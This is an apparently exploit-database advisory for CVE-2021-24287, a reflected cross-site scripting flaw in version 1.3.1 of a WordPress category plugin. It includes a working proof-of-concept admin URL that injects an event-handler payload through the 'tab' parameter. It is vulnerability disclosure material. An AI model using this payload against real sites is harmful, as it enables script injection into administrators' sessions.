WordPress Select All Categories And Taxonomies plugin version 1.3.1 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24287
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Date: 2/15/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-242871. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
Related posts:
Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks
Fake Windows exploits target infosec community with Cobalt Strike
Microsoft Patch Tuesday, April 2022 Edition
Stealthy BLOODALCHEMY Malware Targeting ASEAN Government Networks
The Stark Truth Behind the Resurgence of Russia’s Fin7